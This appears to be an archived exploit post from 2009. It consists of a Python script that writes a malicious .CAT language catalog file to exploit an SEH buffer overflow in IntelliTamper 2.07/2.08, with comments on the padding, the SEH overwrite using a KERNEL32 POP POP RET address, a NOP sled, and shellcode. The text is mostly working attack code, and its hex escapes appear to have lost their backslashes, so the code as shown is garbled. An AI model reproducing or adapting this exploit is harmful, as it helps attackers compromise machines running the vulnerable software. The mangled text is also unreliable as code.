
intellitamperlang-overflow.txt

Posted on 08 January 2009

#!usr/bin/python # IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit. # we start off the exploitation with some fuzzing to determine how many bytes # before overwriting the pointer to next SEH # and pointer to SEH, we will try and overwrite each address with 41414141 "AAAA" [Pointer to next SEH] # and 42424242 "BBBB" [pointer to SEH]. # 0x41414141 Pointer to next SEH record # 0x42424242 SE handler # # The vulnerability was discovered by 'Cnaph'. First click in "File" through your IntelliTamper and >> "Options" # Then open your crafted file .CAT to update your Language catalog and your SEH will be overwritten. # This exploit implements the SEH technique to exploit the issue . . . # When doing SEH overwrites the pointer to the SEH handler is target to be overwritten, # so we can gain control over the program. #/Cnaph. print "[+] IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit."; Variable = "x24x30x30x30x38x30x3D"; Junks =("x41"*761)+("x91"*19702)+(106*"x41") Nex_SEHHandler = "xebx06x90x90"; # JMP SEH_handler = "x61xfbx86x7c"; # SE.42424242 le SEH handler est ecrasé. # L'addresse de déplacement de l'indicateur SEH va etre changé. # KERNEL32.DLL (CALL EBX POP POP RET) NOP_SLED = "x90"*12 Shellcode =((("x31xc0x31xdbx31xc9x31xd2xebx37x59x88x51x0axbb" "x77x1dx80x7c" #LoadlibaryA(libaryname) "x51xffxd3xebx39x59x31xd2x88x51x0bx51x50xbb" "x28xacx80x7c" #GetProcAddress(hmodule,functionname) "xffxd3xebx39x59x31xd2x88x51x06x31xd2x52x51" "x51x52xffxd0x31xd2x50xb8xa2xcax81x7cxffxd0xe8xc4xff" "xffxffx75x73x65x72x33x32x2ex64x6cx6cx4exe8xc2xffxff" "xffx4dx65x73x73x61x67x65x42x6fx78x41x4exe8xc2xffxff" "xffx63x4Ex34x70x68x75x78"))); # Plus = " " Seh_overwrite = Variable + Junks + Nex_SEHHandler + SEH_handler + NOP_SLED + Shellcode genre = ".CAT"; Title = "IntelliTamper_DZ"; headers = open(Title + genre, "w") headers.write(Seh_overwrite) headers.close() print "[+] Exploit file has been successfully built."; print " Cnaph.";

 
